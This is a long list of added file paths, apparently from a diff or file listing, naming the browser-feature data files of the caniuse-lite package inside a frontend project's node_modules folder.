+/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/view-transitions.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/unhandledrejection.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-counters.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/text-stroke.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/es6-generators.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-element-function.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/eme.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-font-stretch.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/portals.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/aac.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/form-validation.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-revert-value.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/font-family-system-ui.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/brotli.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/u2f.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-logical-props.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/web-bluetooth.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/input-event.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/wbr-element.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/keyboardevent-key.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/srcset.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-hyphens.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/eventsource.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/forms.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/audio.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/url-scroll-to-text-fragment.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/av1.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-in-out-of-range.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/woff.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-grid-animation.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-file-selector-button.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/channel-messaging.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/typedarrays.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/webhid.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-print-color-adjust.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/svg.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/hashchange.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/devicepixelratio.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/datauri.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/mpeg-dash.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/element-closest.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/link-rel-preload.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/wasm-simd.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-background-offsets.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/ogg-vorbis.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/eot.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/x-frame-options.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/path2d.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/text-overflow.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/keyboardevent-getmodifierstate.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/fontface.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/subresource-bundling.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/webgl.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-gencontent.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-subgrid.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/custom-elements.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/subresource-integrity.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css3-attr.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/webnfc.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-anchor-positioning.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-case-insensitive.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/pointer.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/flexbox.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/dataset.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/mdn-css-unicode-bidi-plaintext.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-scroll-behavior.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/dispatchevent.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/html-media-capture.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-animation.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/mutation-events.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/document-scrollingelement.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css3-cursors.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/vector-effect.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/svg-html.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/temporal.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/element-scroll-methods.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/async-functions.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/inline-block.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-fixed.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/apng.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/passwordrules.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/viewport-unit-variants.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/indexeddb.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/videotracks.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/rel-noopener.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/ogv.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/colr-v1.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/do-not-track.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/indeterminate-checkbox.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/use-strict.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/mdn-text-decoration-color.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/es6.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/wasm-relaxed-simd.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/textencoder.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/getrandomvalues.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/input-color.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css3-boxsizing.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/deviceorientation.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/kerning-pairs-ligatures.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/getcomputedstyle.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/mpeg4.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-default-pseudo.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/proximity.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/media-fragments.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-math-functions.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/cross-document-view-transitions.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/mediarecorder.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/spellcheck-attribute.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/webvr.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/transforms3d.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/heif.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/input-datetime.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/object-observe.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/insertadjacenthtml.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-placeholder-shown.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/accelerometer.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/element-from-point.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-sel3.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-line-clamp.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/credential-management.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/same-site-cookie-attribute.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/transforms2d.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-touch-action.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-textshadow.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/date-tolocaledatestring.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/payment-request.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/push-api.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/font-unicode-range.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-letter-spacing.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/script-defer.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/wasm-gc.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-placeholder.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/registerprotocolhandler.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-color-function.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-overscroll-behavior.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/webp.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/mdn-css-backdrop-pseudo-element.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/promise-finally.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-mediaqueries.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-marker-pseudo.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/midi.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-optional-pseudo.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-env-function.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css3-tabsize.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/classlist.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/document-evaluate-xpath.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/dragndrop.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/domcontentloaded.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/keyboardevent-code.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/input-selection.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-reflections.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/flexbox-gap.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/es6-class.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-boxdecorationbreak.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/passkeys.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/netinfo.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/wasm-threads.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/iframe-sandbox.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-media-resolution.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-rrggbbaa.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/text-decoration.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/user-select-none.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/audiotracks.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/keyboardevent-which.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/link-rel-dns-prefetch.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/input-inputmode.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-media-range-syntax.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/webkit-user-drag.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-masks.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/currentcolor.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-nth-child-of.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/font-smooth.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/svg-css.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-first-line.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/array-find.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/text-size-adjust.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/wasm-multi-memory.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/webm.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/magnetometer.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/link-icon-svg.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-font-rendering-controls.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/svg-fonts.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/input-placeholder.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/shadowdomv1.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/es5.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/cryptography.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-content-visibility.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/tabindex-attr.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/urlsearchparams.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/speech-recognition.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/dom-manip-convenience.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-media-interaction.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/referrer-policy.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/scrollintoviewifneeded.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/wav.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/promises.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/orientation-sensor.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/lazyload.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/hevc.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/http-live-streaming.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/text-emphasis.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/es6-number.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/readonly-attr.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/internationalization.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/mathml.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/offscreencanvas.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/mdn-css-unicode-bidi-isolate-override.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/wasm-tail-calls.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/input-file-accept.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-boxshadow.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-grid.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-not-sel-list.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/fileapi.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/jpegxr.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/auxclick.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/textcontent.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/childnode-remove.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/multicolumn.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-read-only-write.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/input-range.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/upgradeinsecurerequests.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-namespaces.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/import-maps.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-relative-colors.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/innertext.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/intersectionobserver-v2.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/loading-lazy-attr.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/wasm-signext.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/web-serial.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-containment.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/variable-fonts.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/permissions-api.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/dom-range.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/pagevisibility.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/chacha20-poly1305.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-regions.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/gamepad.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/svg-smil.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/objectrtc.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/wasm-extended-const.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/selection-api.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/gyroscope.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/sdch.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-snappoints.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/keyboardevent-charcode.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/script-async.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/ttf.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/word-break.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/run-in.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/web-share.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/background-attachment.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/server-timing.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/abortcontroller.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-hanging-punctuation.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/background-position-x-y.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/template-literals.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-text-box-trim.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/trusted-types.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/clipboard.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/broadcastchannel.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/font-variant-numeric.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/template.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/minmaxwh.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/webgpu.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/sni.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/document-currentscript.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/comparedocumentposition.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-deviceadaptation.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-at-counter-style.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-rebeccapurple.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/rem.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/history.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/constraint-validation.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/es6-module.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/scrollintoview.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/webxr.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/url.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-width-stretch.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/createimagebitmap.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/colr.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-mixblendmode.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-motion-paths.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-initial-value.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/rel-noreferrer.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/pad-start-end.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-crisp-edges.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/native-filesystem-api.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/mdn-text-decoration-shorthand.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-exclusions.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/es6-module-dynamic-import.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/jpegxl.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/multibackgrounds.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/document-execcommand.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-text-spacing.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/passive-event-listener.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-has.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/geolocation.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/form-submit-attributes.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/keyboardevent-location.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-dir-pseudo.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-media-scripting.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/rest-parameters.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/pointerlock.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/wasm-mutable-globals.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/wasm-nontrapping-fptoint.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/details.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/client-hints-dpr-width-viewport.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-sticky.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/tls1-2.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-module-scripts.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-font-palette.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/link-icon-png.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/x-doc-messaging.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/beacon.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/wasm-bigint.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/link-rel-modulepreload.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/console-basic.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/webtransport.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/decorators.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/once-event-listener.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/input-file-directory.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-text-indent.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/mediacapture-fromelement.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/tls1-3.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-filter-function.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/input-autocomplete-onoff.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/testfeat.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/stream.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/html5semantic.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/svg-img.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/blobbuilder.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/prefers-color-scheme.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/json.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/canvas-text.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/fetch.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/contentsecuritypolicy2.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/shadowdom.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/canvas.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/justify-content-space-evenly.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/webworkers.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/customevent.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/iframe-seamless.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/intrinsic-width.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/documenthead.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/ping.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/svg-filters.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/pointer-events.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/tls1-1.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/array-find-index.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/xhtml.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-overflow-overlay.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-all.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/wasm-multi-value.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/rellist.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-grid-lanes.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/hidden.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/object-fit.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/xml-serializer.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/wake-lock.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/progress.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/http3.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/indexeddb2.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/imports.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/background-sync.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/touch.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-autofill.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/cors.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/sxg.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/avif.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-text-wrap-balance.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/publickeypinning.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-appearance.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/high-resolution-time.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/async-clipboard.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/img-naturalwidth-naturalheight.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/streams.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/xhr2.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/atob-btoa.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/offline-apps.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/serviceworkers.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/filesystem.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/meta-theme-color.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/js-regexp-lookbehind.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/css-zoom.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/user-timing.js +/opt/service_finder/frontend/node_modules/caniuse-lite/data/features/selectlist.js 